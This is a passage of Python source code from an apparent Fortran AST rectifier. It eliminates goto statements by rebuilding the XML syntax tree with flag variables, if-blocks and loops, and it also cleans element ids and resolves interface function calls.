self.boundary_identifier_for_backward_goto(
stmts_follow_label, goto_index_holder,
number_of_gotos, target_label_lbl
)
# In case of multiple goto statements appears,
# slice them into N number of list objects
# The location of goto statement (inner to outer)
# is represented by the increament of index
# i.e. [0]: innermost, [N]: Outermost
multiple_goto_stmts = []
self.multiple_goto_identifier(
goto_index_holder, multiple_goto_stmts,
stmts_follow_label
)
# Check whether there is nested label_after
# case goto statements. Handles one case
# at a time.
nested_gotos_exist =\
self.nested_forward_goto_identifier(multiple_goto_stmts)
# Generate loop ast
self.construct_goto_loop(
parent, reconstruct_target,
nested_gotos_exist, multiple_goto_stmts,
number_of_gotos, declared_label_flag_num,
traverse, target_label_lbl)
# Recover rest of the statements
self.statement_recovery(statements_to_recover, parent, traverse)
# Set all holders and checkers (markers) to default
self.label_before = False
self.reconstruct_before_case_now = False
self.reconstruct_for_before_done = True
self.label_lbl_for_before.clear()
self.statements_to_reconstruct_before['stmts-follow-label'] = []
self.statements_to_reconstruct_before['count-gotos'] = 0
def reconstruct_header(
self, temp_elem_holder, parent
):
"""This function is for reconstructing the oddly
generated header AST to have an uniform structure
with other multiary type operation nested headers.
Args:
temp_elem_holder (list): A temporary holder that
holds statements under header for swap.
parent (:obj: 'ET'): A parent ET object that current
Return:
None.
"""
# This operation is basically for switching
# the location of operator and 2nd operand,
# so the output syntax can have a common structure
# with other operation AST
op = temp_elem_holder.pop()
temp_elem_holder.insert(1, op)
# First create <operation> element
# Currently, only assume multiary reconstruction
operation = ET.SubElement(
parent, "operation", {"type":"multiary"}
)
for elem in temp_elem_holder:
if elem.tag == "name" or elem.tag == "literal":
operand = ET.SubElement(operation, "operand")
value = ET.SubElement(operand, elem.tag, elem.attrib)
else:
assert (
elem.tag == "equiv-operand__equiv-op"
), f"Tag must be 'equiv-operand__equiv-op'. Current: {elem.tag}."
operator = ET.SubElement(
operation, "operator", {"operator":elem.attrib['equivOp']}
)
parent.remove(elem)
def goto_boundary_corrector(self, reconstruct_target, stmts_follow_goto, stmts_follow_label):
"""This function is for correcting the boundaries of goto
statements in case of a multiple gotos are nested and
crossing each other.
Args:
reconstruct_target (dict): A dictionary that holds statements
for goto and label as well as the number of goto counter.
stmts_follow_goto (list): A list that holds statements
after goto statement.
stmts_follow_label (list): A list that holds statements
after label statements.
Return:
None.
"""
# If [0] <goto-stmt> is an inner scope statement of the [N-1]
# <goto-stmt>in the stmts_follow_goto, then we need to correct
# the boundary issue by moving the [N-1] element to
# the end of stmts_follow_label
last_stmt = reconstruct_target['stmts-follow-goto'][-1]
if "goto-stmt" in last_stmt.attrib:
first_goto = reconstruct_target['stmts-follow-goto'][0]
if last_stmt.attrib['lbl'] == first_goto.attrib['parent-goto']:
last_goto = reconstruct_target['stmts-follow-goto'].pop()
last_goto.attrib['next-goto'] = "true"
stmts_follow_label.append(last_goto)
goto_and_label_stmts_after_goto = []
for stmt in stmts_follow_goto:
if "label" in stmt.attrib:
goto_and_label_stmts_after_goto.append(stmt.attrib['label'])
elif "goto-stmt" in stmt.attrib:
goto_and_label_stmts_after_goto.append(stmt.attrib['lbl'])
num_of_goto_and_label_after_label = 0
index = 0
for stmt in stmts_follow_label:
if (
"label" in stmt.attrib
or "goto-stmt" in stmt.attrib
):
num_of_goto_and_label_after_label += 1
# Since the first label-statement of
# stmts_follow_label is always a match
# for the first goto-statement in the
# stmt_follow_goto in the label_after case,
# remove the goto-move (label_before) case mark
if (
index == 0
and "goto-move" in stmt.attrib
):
del stmt.attrib['goto-move']
# -2 disregarding the first and last statements
num_of_goto_and_label_after_label -= 2
for i in range(num_of_goto_and_label_after_label):
stmt = stmts_follow_label.pop(-2)
stmts_follow_goto.append(stmt)
def reconstruct_stmts_follow_goto_after_case(
self, header, parent, stmts_follow_goto,
next_goto, traverse, reconstructed_goto_elem,
index
):
"""This function generates a new if statement to
nests statements that follow goto-stmt based on
condition or non-condition status to eliminate
goto.
Args:
next_goto (list): A list to hold next goto-stmt that may exist
within the boundary of current goto.
reconstructed_goto_elem (list): A list that will hold
reconstructed if statements.
header (list): A header tht holds conditional header.
parent (:obj: 'ET'): A parent ET object that current
element will be nested under.
stmts_follow_goto (list): A list that holds statements
within the boundary of currently handling goto.
traverse (int): A current traverse counter.
index (int): An index of goto.
Return:
None.
"""
if self.conditional_goto:
if not self.outward_move and not self.inward_move:
self.need_op_negation = True
if header[0] is not None:
self.generate_if_element(
header[0], parent, stmts_follow_goto, next_goto, True, None,
None, None, None, traverse, reconstructed_goto_elem
)
elif self.outward_move:
for stmt in stmts_follow_goto:
if "skip-collect" not in stmt.attrib:
cur_elem = ET.SubElement (parent, stmt.tag, stmt.attrib)
self.parseXMLTree(stmt, cur_elem, stmt, parent, traverse)
else:
assert (
False
), "Currently inward movement for goto is not being handled."
else:
self.generate_if_element(
None, parent, stmts_follow_goto, next_goto, True, "unary",
f"goto_flag_{index + 1}", None, ".not.", traverse,
reconstructed_goto_elem
)
if reconstructed_goto_elem:
stmts_follow_goto = reconstructed_goto_elem[0]
def handle_in_outward_movement(self, stmts_follow_goto, stmts_follow_label, parent):
"""This function checks the lexical level of goto and label.
Then, generate and add (remove) statements to the statement
holders, so they can be handled appropriately.
Args:
stmts_follow_goto (list): It holds all the statements
that appeared after the goto statement in the original
code.
stmts_follow_label (list): It holds all the statements
that appeared after the label statement in the original
code.
parent (:obj: 'ET'): A parent ET object that current
element will be nested under.
Returns:
None.
"""
body_levels = {}
for goto_stmt in stmts_follow_goto:
# If the statements are in different level,
# we do not want to have them in the stmts_follow_goto,
# so check such case and remove anything follow goto-stmt.
if (
self.outward_move
and ("generated-exit-stmt" not in goto_stmt.attrib
and "goto-stmt" not in goto_stmt.attrib)
):
stmts_follow_goto.remove(goto_stmt)
if "goto-stmt" in goto_stmt.attrib:
lbl = goto_stmt.attrib['lbl']
body_levels[lbl] = goto_stmt.attrib['body-level']
for label_stmt in stmts_follow_label:
if 'target-label-statement' in label_stmt.attrib:
label = label_stmt.attrib['label']
label_body_level = label_stmt.attrib['body-level']
# A goto-forward case where goto and label are
# located in different levels
if (
label in body_levels
and body_levels[label] != label_body_level
):
if self.body_level_rank[label_body_level]\
< self.body_level_rank[body_levels[label]]:
self.outward_move = True
# Since outward movement is simply adding exit (break) to
# the goto-stmt place, we have to create <exit> statement,
# then append it to the stmts_follo_goto
statement = ET.SubElement(parent, "statement")
statement.attrib['generated-exit-stmt'] = "true"
exit = ET.SubElement(statement, "exit")
stmts_follow_goto.append(statement)
# We need to remove it from the parent as it was just
# a place holder before append to the list
parent.remove(statement)
if label_body_level != "loop":
self.goto_under_loop = False
else:
self.goto_under_loop = True
def reconstruct_next_goto(self, next_goto, reconstructed_goto_elem, parent):
"""This function reconstruct a goto statement that appears
after the currently handling goto case. The default case
is that the next goto is a backward goto case, which
requires reconstruction by reconstruct_goto_before function.
Thus, this function prepares the ingredient for it.
Args:
next_goto (list): Holds statement and goto-stmt elements.
reconstructed_goto_elem (list): Holds reconstructed if statements
that was generated after eliminating the goto.
header (list): A header tht holds conditional header.
Return:
None.
"""
statement = ET.SubElement(
parent, next_goto[0]['statement'].tag,
next_goto[0]['statement'].attrib
)
goto_stmt = ET.SubElement(
statement, next_goto[0]['goto-stmt'].tag,
next_goto[0]['goto-stmt'].attrib
)
if (
reconstructed_goto_elem
and reconstructed_goto_elem[0].attrib['label']
== goto_stmt.attrib['target_label']
):
for stmt in reconstructed_goto_elem:
self.statements_to_reconstruct_before['stmts-follow-label'].append(stmt)
self.statements_to_reconstruct_before['stmts-follow-label'].append(statement)
if self.statements_to_reconstruct_before['count-gotos'] < 1:
self.statements_to_reconstruct_before['count-gotos'] = 1
self.reconstruct_before_case_now = True
self.reconstruction_for_before_done = False
def check_conditional_goto(self, header, stmts_follow_goto):
"""This function checks whether the goto is conditional
or unconditional. If it's conditional, it extracts
conditional operation (header).
Args:
header (list): A header tht holds conditional header.
stmts_follow_goto (list): It holds all the statements
that appeared after the goto statement in the original
code.
Returns:
None.
"""
# Check for the status whether current <goto-stmt> is
# conditional. If yes, only extract the header (condition)
# and remove the if statement AST from the tree.
uniq_code = None
for stmt in stmts_follow_goto:
if (
stmt.tag == "statement"
and "goto-stmt" in stmt.attrib
and "conditional-goto-stmt" in stmt.attrib
):
uniq_code = stmt.attrib['code']
self.conditional_goto = True
if uniq_code in self.conditional_op:
header[0] = self.conditional_op[uniq_code]
def reconstruct_stmts_follow_label_after_case(
self, stmts_follow_label, next_goto,
reconstructed_goto_elem, header, traverse,
parent, index
):
"""This function generates a new statements to
nest statements that follow label based on
condition or non-condition status to eliminate
goto.
Args:
next_goto (list): A list to hold next goto-stmt that may exist
within the boundary of current goto.
reconstructed_goto_elem (list): A list that will hold
reconstructed if statements.
header (list): A header tht holds conditional header.
parent (:obj: 'ET'): A parent ET object that current
element will be nested under.
stmts_follow_label (list): A list that holds statements
follow label statement for currently handling goto.
traverse (int): A current traverse counter.
index (int): An index of goto.
Return:
None.
"""
for stmt in stmts_follow_label:
if len(stmt) > 0:
# A case where another goto-stmt appears after the current label
if "goto-stmt" in stmt.attrib:
goto_stmt = {}
goto_stmt['statement'] = stmt
for child in stmt:
if child.attrib['target_label'] in self.goto_target_lbl_before:
goto_stmt['statement'].attrib['goto-move'] = "true"
if (
child.attrib['target_label'] not in self.goto_target_lbl_after
and "goto-move" in goto_stmt['statement']
):
del goto_stmt['statement'].attrib['goto-move']
goto_stmt['goto-stmt'] = child
next_goto.append(goto_stmt)
else:
# A case where both goto and label are under the same level
if not self.outward_move and not self.inward_move:
reconstructed_goto_elem.append(stmt)
if not self.encapsulate_under_do_while:
statement = ET.SubElement(parent, stmt.tag, stmt.attrib)
for child in stmt:
cur_elem = ET.SubElement(statement, child.tag, child.attrib)
if len(child) > 0:
self.parseXMLTree(child, cur_elem, statement, parent, traverse)
# A case where outward movement goto handling is need
elif self.outward_move:
label_body_level = self.body_elem_holder[stmt.attrib['body-level']]
# If goto is a conditional case, but under else then
# there is no header operation. Thus, we simply declare new boolean
# variable like a non-conditional goto, then use that variable to
# construct new if statement and nest statement under label.
if self.goto_under_else:
number_of_gotos = int(self.statements_to_reconstruct_after['count-gotos'])
declared_goto_flag_num = []
self.generate_declaration_element(
label_body_level, "goto_flag", number_of_gotos,
declared_goto_flag_num, traverse
)
self.generate_if_element(
None, label_body_level, stmts_follow_label, next_goto, False, None,
f"goto_flag_{index + 1}", None, None, traverse,
reconstructed_goto_elem
)
else:
self.generate_if_element(
header[0], label_body_level, stmts_follow_label, next_goto, True, None,
None, None, None, traverse, reconstructed_goto_elem
)
# A case where inward movement goto handling is need
else:
pass
def restruct_declaration(self, elem_declaration, parent):
"""This function is to restructure declaration to have an uniform
xml structure."""
declaration = ET.SubElement(
parent, elem_declaration.tag, elem_declaration.attrib
)
for child in elem_declaration:
subelem = ET.SubElement(
declaration, child.tag, child.attrib
)
self.generate_element(child, subelem)
if child.tag == "type":
dimensions = ET.SubElement(
declaration,
self.dimensions_holder.tag,
self.dimensions_holder.attrib
)
self.handle_tag_dimensions(self.dimensions_holder, dimensions, parent, parent, 1)
def generate_element(self, current_elem, parent_elem):
"""This function is to traverse the existing xml and generate
a new copy to the given parent element - This is a recursive function."""
for child in current_elem:
if len(child) > 0 or child.text:
elem = ET.SubElement(
parent_elem, child.tag, child.attrib
)
self.generate_element(child, elem)
else:
subelem = ET.SubElement(
parent_elem, child.tag, child.attrib
)
if subelem.tag == "variable":
subelem.attrib['is_array'] = "true"
#################################################################
# #
# ELEMENT GENERATORS #
# #
#################################################################
def generate_declaration_element(
self, parent, default_name, number_of_gotos,
declared_flag_num, traverse
):
"""A flag declaration and assignment xml generation.
This will generate N number of label_flag_i or goto_i,
where N is the number of gotos in the Fortran code
and i is the number assigned to the flag
Args:
parent (:obj: 'ET'): Parent element object.
default_name (str): A default name given for
new variable.
number_of_gotos (int): A number of gotos. Amount
of variables will be generated based on this number.
declared_flag_num (list): A list to hold the number
of delcared varaibles (flags).
traverse (int): A current traverse counter.
Return:
None.
"""
# Declaration
specification_attribs = {
"declaration": "1",
"implicit": "1",
"imports": "0",
"uses": "0"
}
specification_elem = ET.SubElement(
parent, "specification", specification_attribs
)
declaration_elem = ET.SubElement(
specification_elem, "declaration", {"type": "variable"}
)
type_attribs = {
"hasKind": "false",
"hasLength": "false",
"is_derived_type": "False",
"keyword2": "none",
"name": "logical",
}
type_elem = ET.SubElement(
declaration_elem, "type", type_attribs
)
variables_elem = ET.SubElement(
declaration_elem,
"variables",
{"count": str(number_of_gotos)}
)
variable_attribs = {
"hasArraySpec": "false",
"hasCharLength": "false",
"hasCoarraySpec": "false",
"hasInitialValue": "false",
"hasInitialization": "false",
"is_array": "false",
}
for flag in range(number_of_gotos):
flag_num = flag + 1
if default_name == "label_flag":
if flag_num in self.declared_label_flags:
flag_num = self.declared_label_flags[-1] + 1
if default_name == "goto_flag":
if flag_num in self.declared_goto_flags:
flag_num = self.declared_goto_flags[-1] + 1
self.declared_label_flags.append(flag_num)
declared_flag_num.append(flag_num)
variable_attribs['id'] = f"{default_name}_{flag_num}"
variable_attribs['name'] = f"{default_name}_{flag_num}"
variable_elem = ET.SubElement(
variables_elem, "variable", variable_attribs
)
# Assignment
for flag in range(number_of_gotos):
flag_num = declared_flag_num[flag]
declared_flag_num.append(flag_num)
statement_elem = ET.SubElement(parent, "statement")
self.generate_assignment_element(
statement_elem, f"{default_name}_{flag_num}", None, "literal",
"true", traverse
)
def generate_assignment_element(
self, parent, name_id, condition, value_type, value, traverse
):
"""This is a function for generating new assignment element xml
for goto reconstruction.
Args:
parent (:obj: 'ET'): Parent element object.
name_id (str): Name of a target variable.
value_type (str): Type of value that will be assigned.
traverse (int): A current traverse counter.
Returns:
None.
"""
assignment_elem = ET.SubElement(parent, "assignment")
target_elem = ET.SubElement(assignment_elem, "target")
self.generate_name_element(
target_elem, "false", name_id, "false", "1", "variable"
)
value_elem = ET.SubElement(assignment_elem, "value")
# Unconditional goto has default values of literal as below
if value_type == "literal":
assert (
condition is None
), "Literal type assignment must not hold condition element."
literal_elem = ET.SubElement(
value_elem, "literal", {"type": "bool", "value": value}
)
# Conditional goto has dynamic values of operation
else:
assert (
condition is not None
), "Conditional <goto-stmt> assignment must be passed with operation."
unique_code = parent.attrib['code']
for stmt in condition[unique_code]:
if stmt.tag == "operation":
condition_op = stmt
operation_elem = ET.SubElement(
value_elem, condition_op.tag, condition_op.attrib
)
self.parseXMLTree(
condition_op, operation_elem,
value_elem, assignment_elem,
traverse
)
def generate_operation_element(self, parent, op_type, operator, name):
"""This is a function for generating new operation element and
its nested subelements with the passes arguments.
Currently, it generates only a unary operation syntax only.
It may require update in the future.
Args:
parent (:obj: 'ET'): Parent element object.
op_type (str): Operation type.
operator (str): Operator.
name (str): Name of a variable for new element.
Returns:
None.
"""
operation_elem = ET.SubElement(parent, "operation", {"type": op_type})
operator_elem = ET.SubElement(operation_elem, "operator",
{"operator": operator})
operand_elem = ET.SubElement(operation_elem, "operand")
self.generate_name_element(operand_elem, "false", name, "false", "1",
"ambiguous")
def generate_name_element(self, parent, hasSubscripts, name_id, is_array,
numPartRef, name_type):
"""This is a function for generating new name element based on
the provided arguments.
Args:
parent (:obj: 'ET'): Parent element object.
hasSubscripts (str): "true" or "false" status in string.
name_id (str): Name of a variable.
numPartRef (str): Number of references.
type (str): Type of a variable.
Returns:
None.
"""
name_attribs = {
"hasSubscripts": hasSubscripts,
"id": name_id,
"is_array": is_array,
"numPartRef": numPartRef,
"type": name_type,
}
name_elem = ET.SubElement(parent, "name", name_attribs)
def generate_if_element(
self, header, parent, stored_stmts, next_goto,
need_operation, op_type, lhs, rhs, operator,
traverse, reconstructed_goto_elem
):
"""This is a function generating new if element.
Since header can hold unary, multiary, or name, some arguments
may be passed with None. Check them to generate an appropriate XML.
Args:
header (:obj: 'ET'): Header element from if.
parent (:obj: 'ET'): Parent element object.
stored_stmts (list): List of statements.
next_goto (list): Another gotos appear while
handling current goto stmt.
need_operation (bool): Boolean to state whether
new if needs operation header.
op_type (str): Operation type.
lhs (str): Left hand side variabel name.
rhs (str): Right hand side variabel name.
operator (str): Operator.
traverse (int): Current traverse counter.
reconstructed_goto_elem (list): A list to
hold reconstructed AST after goto elimination.
Returns:
None.
"""
goto_nest_if_elem = ET.SubElement(parent, "if", {"parent":parent.attrib['parent']})
header_elem = ET.SubElement(goto_nest_if_elem, "header")
if need_operation:
if header is None:
self.generate_operation_element(header_elem, op_type, operator,
lhs)
else:
for stmt in header:
operation_elem = ET.SubElement(header_elem, stmt.tag,
stmt.attrib)
self.parseXMLTree(stmt, operation_elem, header_elem,
goto_nest_if_elem, traverse)
else:
self.generate_name_element(header_elem, "false", lhs, "false", "1",
"variable")
# Generate AST for statements that will be nested under if (!cond) or (cond)
label = None
statement_num = 0
label_before_within_scope = False
body_elem = ET.SubElement(goto_nest_if_elem, "body")
for stmt in stored_stmts:
if len(stmt) > 0:
if "skip-collect" in stmt.attrib:
parent_scope = stmt.attrib['parent-goto']
if parent_scope in self.goto_label_with_case:
if self.goto_label_with_case[parent_scope] == "before":
goto_nest_if_elem.attrib['label'] = parent_scope
self.encapsulate_under_do_while = True
else:
if (
"next-goto" not in stmt.attrib
or (
"lbl" in stmt.attrib
and stmt.attrib['lbl'] == self.current_label
)
):
if "goto-move" in stmt.attrib and not label_before_within_scope:
if "target-label-statement" in stmt.attrib:
del stmt.attrib['goto-move']
del stmt.attrib['target-label-statement']
label_before_within_scope = True
# If label for label-before case is the first statement,
# we want to mark this entire if-statement because it
# represents that it needs to be encapsulated with do-while
if statement_num == 0:
self.encapsulate_under_do_while = True
# Reinitialize counter to 0 to count the number of gotos
# only within the current scope
self.statements_to_reconstruct_before['count-gotos'] = 0
self.statements_to_reconstruct_before['stmts-follow-label'] = []
self.current_label = stmt.attrib['label']
if label_before_within_scope:
self.statements_to_reconstruct_before[
'stmts-follow-label'].append(stmt)
for child in stmt:
if child.tag == "label":
label = child.attrib['lbl']
if self.current_label == label:
if self.encapsulate_under_do_while:
goto_nest_if_elem.attrib[
'label'] = label
if child.tag == "goto-stmt":
# If current goto-stmt label is equal to the scope label,
# it means that end-of-scope is met and ready to reconstruct
if self.current_label == child.attrib['target_label']:
self.statements_to_reconstruct_before['count-gotos'] += 1
# Since we are going to handle the first label-before
# case, remove the label lbl from the list
del self.goto_target_lbl_before[0]
label_before_within_scope = False
self.current_label = None
reconstruct_target = self.statements_to_reconstruct_before
self.reconstruct_goto_before_label(
body_elem, traverse,
reconstruct_target)
# Else, a new goto-stmt was found that is nested current label_before
# case scope, so we need to update the parent for it
else:
stmt.attrib['parent-goto'] = self.current_label
else:
cur_elem = ET.SubElement(body_elem, stmt.tag,
stmt.attrib)
if "goto-remove" in cur_elem.attrib:
del cur_elem.attrib['goto-remove']
for child in stmt:
child_elem = ET.SubElement(cur_elem, child.tag,
child.attrib)
if len(child) > 0:
self.parseXMLTree(child, child_elem,
cur_elem, parent,
traverse)
else:
if need_operation:
goto_stmt = {}
goto_stmt['statement'] = stmt
for child in stmt:
assert (
child.tag == "goto-stmt"
), f"Must only store <goto-stmt> in next_goto['goto-stmt']. Current: <{child.tag}>."
if child.attrib[
'target_label'] in self.goto_target_lbl_before:
goto_stmt['statement'].attrib[
'goto-move'] = "true"
if (
child.attrib[
'target_label'] not in self.goto_target_lbl_after
and "goto-move" in goto_stmt['statement']
):
del goto_stmt['statement'].attrib['goto-move']
goto_stmt['goto-stmt'] = child
next_goto.append(goto_stmt)
statement_num += 1
if (
self.encapsulate_under_do_while
and (
(
goto_nest_if_elem.attrib['parent'] != "program"
and self.outward_move
)
or (
goto_nest_if_elem.attrib['parent'] == "program"
and not self.outward_move
)
)
):
goto_nest_if_elem.attrib['goto-move'] = "true"
reconstructed_goto_elem.append(goto_nest_if_elem)
parent.remove(goto_nest_if_elem)
#################################################################
# #
# MISCELLANEOUS #
# #
#################################################################
def clean_derived_type_ref(self, current):
"""This function will clean up the derived type referencing syntax,
which is stored in a form of "id='x'%y" in the id attribute.
Once the id gets cleaned, it will call the
reconstruc_derived_type_ref function to reconstruct and replace the
messy version of id with the cleaned version.
Args:
current (:obj: 'ET'): Current element object.
Returns:
None.
"""
current_id = current.attrib[
"id"
] # 1. Get the original form of derived type id, which is in a form of,
# for example, id="x"%y in the original XML.
self.derived_type_var_holder_list.append(
self.clean_id(current_id)
) # 2. Extract the first variable name, for example, x in this case.
percent_sign = current_id.find(
"%"
) # 3. Get the location of the '%' sign.
self.derived_type_var_holder_list.append(
current_id[percent_sign + 1: len(current_id)]
) # 4. Get the field variable. y in this example.
self.reconstruct_derived_type_ref(current)
def clean_id(self, unrefined_id):
"""This function refines id (or value) with quotation
marks included by removing them and returns only
the variable name. For example, from "OUTPUT"
to OUTPUT and "x" to x.
Thus, the id name will be modified as below:
Unrefined id - id = ""OUTPUT""
Refined id - id = "OUTPUT"
Args:
unrefined_id (str): Id of name element that holds
unnecessary strings.
Returns:
None
"""
return re.findall(r"\"([^\']+)\"", unrefined_id)[0]
def clean_attrib(self, current):
"""The original XML elements holds 'eos' and
'rule' attributes that are not necessary
and being used. Thus, this function will
remove them in the rectified version of
XML.
Args:
current (:obj: 'ET'): Current element object.
Returns:
None.
"""
if "eos" in current.attrib:
current.attrib.pop("eos")
if "rule" in current.attrib:
current.attrib.pop("rule")
def boundary_identifier(self):
"""This function will be called to identify the boundary
for each goto-and-label. The definition of scope here is
that whether one goto-label is nested under another goto-label.
For example:
<label with lbl = 111>
____<goto-stmt with lbl = 222>
____<label with lbl = 222>
<goto-stmt with lbl = 111>
In this case, "goto-label with lbl = 222" is within
the scope of "lbl = 111"
Thus, the elements will be assigned with "parent-goto" attribute with 111.
Args:
None.
Returns:
None.
"""
boundary = {}
lbl_counter = {}
goto_label_in_order = []
goto_and_labels = self.encountered_goto_label
for lbl in goto_and_labels:
if lbl not in lbl_counter:
lbl_counter[lbl] = 1
else:
lbl_counter[lbl] += 1
# Identify each label's parent label (scope)
if not goto_label_in_order:
goto_label_in_order.append(lbl)
else:
if lbl not in goto_label_in_order:
parent = goto_label_in_order[-1]
boundary[lbl] = parent
goto_label_in_order.append(lbl)
# Since the relationship betwen label:goto-stmt is 1:M,
# find the label that has multiple goto-stmts.
# Because that extra <goto-stmt> creates extra scope to
# encapsulate other 'label-goto' or 'goto-label'.
for lbl in goto_label_in_order:
if lbl not in boundary:
for label, counter in lbl_counter.items():
if counter > 1 and counter % 2 > 0:
boundary[lbl] = label
# This will check for the handled goto cases.
# If any unhandled case encountered, then it will
# assert and give out an error. Else, return nothing
self.case_availability (boundary)
boundary_for_label = boundary.copy()
self.parent_goto_assigner (
boundary, boundary_for_label,
self.statements_to_reconstruct_before['stmts-follow-label']
)
self.parent_goto_assigner (
boundary, boundary_for_label,
self.statements_to_reconstruct_after['stmts-follow-goto']
)
self.parent_goto_assigner (
boundary, boundary_for_label,
self.statements_to_reconstruct_after['stmts-follow-label']
)
def update_function_arguments(self, current):
"""This function handles function definition's
arguments with array status based on the information
that was observed during the function call
Args:
current (:obj: 'ET'): Current node (either call or value)
Returns:
None.
"""
fname = current.attrib['fname']
if fname in self.arguments_list:
callee_arguments = self.arguments_list[fname]
for arg in callee_arguments:
# self.caller_arr_arguments holds any element
# only when arrays are being passed to functions
# as arguments. Thus, we first need to check if
# callee function name exists in the list
if (
fname in self.caller_arr_arguments
and arg.attrib['name'] in self.caller_arr_arguments[fname]
):
arg.attrib['is_array'] = "true"
else:
arg.attrib['is_array'] = "false"
# re-initialize back to initial values
self.call_function = False
def update_call_argument_type(self, current, update, scope, arguments_info):
"""This function updates call statement function argument xml
with variable type."""
if (
(current.tag == "name"
and update)
and (scope in self.variables_by_scope
and current.attrib['id'] in self.variables_by_scope[scope])
):
current.attrib['type'] = self.variables_by_scope[scope][current.attrib['id']]
arguments_info.append(current.attrib['type'])
elif current.tag == "literal":
if current.attrib['type'] in TYPE_MAP:
type_info = TYPE_MAP[current.attrib['type']]
else:
type_info = current.attrib['type']
arguments_info.append(type_info)
for child in current:
if current.tag == "subscript":
update = True
self.update_call_argument_type(child, update, scope, arguments_info)
def replace_interface_function_to_target(self, current, arguments_info):
"""This function will check whether replacing function name is needed
or not. That is if the Fortran source code has module with interface
and does dynamic dispatching to functions."""
cur_function = current.attrib['fname'].lower()
target_function = None
for module in self.used_modules:
if module in self.module_summary:
interface_funcs = self.module_summary[module]['interface_functions']
if cur_function in interface_funcs:
interface_func_list = interface_funcs[cur_function]
for func in interface_func_list:
function_args = interface_func_list[func]
found_target_function = False
if len(arguments_info) == len(function_args):
i = 0
# a: argument, t: type
for a, t in function_args.items():
if t == arguments_info[i].lower():
found_target_function = True
else:
found_target_function = False
break
i += 1
# If target function was found in the interface function list,
# modify the current <call> element name and its child <name>
# element id with the target function name from the interface name.
if found_target_function:
# The order of modifying is important.
# MUST modify child element <name> first before modifying
# current <call>.
for elem in current:
if (
elem.tag == "name"
and elem.attrib['id'] == current.attrib['fname']
):
elem.attrib['id'] = func
for subElem in elem:
if subElem.tag == "subscripts":
subElem.attrib['fname'] = func
current.attrib['fname'] = func
#################################################################
# #
# GOTO ELIMINATION HELPER FUNCTIONS #
# #
#################################################################
def case_availability(self, boundary):
"""This function checks for the goto cases in the code based
on the boundary. If any unhandled case encountered, then it
will assert and halt the program.
Args:
boundary (dict): A dictonary of goto label
and boundary label.
Returns:
None.
"""
# Case check for more than double nested goto case
nested_gotos = {}
root_boundary = None
current_boundary = None
for goto, boundary in boundary.items():
if current_boundary is None:
current_boundary = goto
root_boundary = goto
nested_gotos[root_boundary] = 1
else:
if boundary == current_boundary:
nested_gotos[root_boundary] += 1
assert (
nested_gotos[root_boundary] <= 2
), f"Do do not handle > 2 nested goto case at this moment."
else:
root_boundary = goto
nested_gotos[root_boundary] = 1
current_boundary = goto
# All cases are currently handled
return
def parent_goto_assigner(self, boundary, boundary_for_label,
statements_to_reconstruct
):
"""This function actually assigns boundary(s) to each goto
and label statements.
Args:
boundary (list): A list of boundaries.
boundary_for_label (dict): A dictionary of
label as a key and its parent boundary label.
statements_to_reconstruct (list): A list of
statements that require reconstruction.
Returns:
None.
"""
for stmt in statements_to_reconstruct:
if "goto-stmt" in stmt.attrib:
target_lbl = stmt.attrib['lbl']
if target_lbl in boundary:
stmt.attrib['parent-goto'] = boundary[target_lbl]
del boundary[target_lbl]
else:
stmt.attrib['parent-goto'] = "none"
if "target-label-statement" in stmt.attrib:
label = stmt.attrib['label']
if label in boundary_for_label:
stmt.attrib['parent-goto'] = boundary_for_label[label]
del boundary_for_label[label]
else:
stmt.attrib['parent-goto'] = "none"
def remove_dup_stmt(self, stmts_follow_label):
"""This removes the statement that's a child statement of
if body being seprately re-added to the list.
Args:
stmts_follow_label (:obj: 'ET'): A list that holds
statements appeard under the label-statement for
reconstruction.
Returns:
None.
"""
prev_stmt = None
for stmt in stmts_follow_label:
if prev_stmt is not None:
# This statement always appears right before
# the if-statement, so check this condition
# and remove it from the list.
if (
stmt.tag == "if"
and (prev_stmt.tag == "statement"
and prev_stmt.attrib['body-level'] == "if")
):
stmts_follow_label.remove(prev_stmt)
prev_stmt = stmt
def boundary_identifier_for_backward_goto(
self, stmts_follow_label, goto_index_holder,
number_of_gotos, target_label_lbl
):
"""This function identifies the boundary from label to goto.
Remove any statements that are not within the boundary.
Then, store those removed statements seprately for later
restoration.
Args:
stmts_follow_label (list): A list holding the
statements that appear after the label-statement
for reconstruction.
goto_index_holder (list): A list of index of goto
in the stmts_follow_label.
number_of_gotos (int): Number of gotos in the
stmts_follow_label.
target_label_lbl (list): A list that should
only hold one value of label-stmt's label value.
Returns:
(list): A list of statements that requires
restoration after loop generation.
"""
index = 0
goto_counter = 0
for stmt in stmts_follow_label:
if (
index == 0
and "label" in stmt.attrib
):
target_label_lbl[0] = stmt.attrib['label']
for child in stmt:
if (
child.tag == "goto-stmt"
and child.attrib['target_label'] == target_label_lbl[0]
):
goto_counter += 1
goto_index_holder.append(index)
if goto_counter == number_of_gotos:
break
index += 1
statements_to_recover = stmts_follow_label[index+1:len(stmts_follow_label)]
for stmt in statements_to_recover:
if (
stmt.tag == "if"
and "conditional-goto-stmt-lbl" in stmt.attrib
):
statements_to_recover.remove(stmt)
del stmts_follow_label[index + 1:len(stmts_follow_label)]
return statements_to_recover
def multiple_goto_identifier (
self, goto_index_holder,
multiple_goto_stmts, stmts_follow_label
):
"""This function identifies any additional goto
statements may appear within the boundary of
currently handling backward goto case.
Args:
stmts_follow_label (list): A list holding the
statements that appear after the label-statement
for reconstruction.
goto_index_holder (list): A list of index of goto
in the stmts_follow_label.
multiple_goto_stmts (list): A list that will hold
additional gotos within the boundary of current
goto.
Returns:
None.
"""
for i in range(len(goto_index_holder)):
if i == 0:
multiple_goto_stmts.append(
stmts_follow_label[0:goto_index_holder[i] + 1]
)
else:
if i + 1 < len(goto_index_holder):
multiple_goto_stmts.append(
stmts_follow_label[
goto_index_holder[i - 1] + 1:goto_index_holder[
i + 1] + 1]
)
else:
multiple_goto_stmts.append(
stmts_follow_label[
goto_index_holder[i - 1] + 1:goto_index_holder[-1] + 1]
)
def nested_forward_goto_identifier(self, multiple_goto_stmts):
"""This function identifies any existing forward
goto case nested under the backward goto case.
Args:
multiple_goto_stmts (list): A list that will hold
additional gotos within the boundary of current
goto.
index_boundary (list): A list that will hold
the indices of label of <label> and <goto-stmt>.
Returns:
(bool): A boolean status indicating whether the
nested forward goto exists within the boundary.
"""
labels = []
index_boundary = []
nested_gotos_exist = False
for goto in multiple_goto_stmts:
index = 0
main_loop_lbl = goto[0].attrib['label']
label_after_lbl = None
for stmt in goto:
if "label" in stmt.attrib:
labels.append(stmt.attrib["label"])
if stmt.attrib["label"] == label_after_lbl:
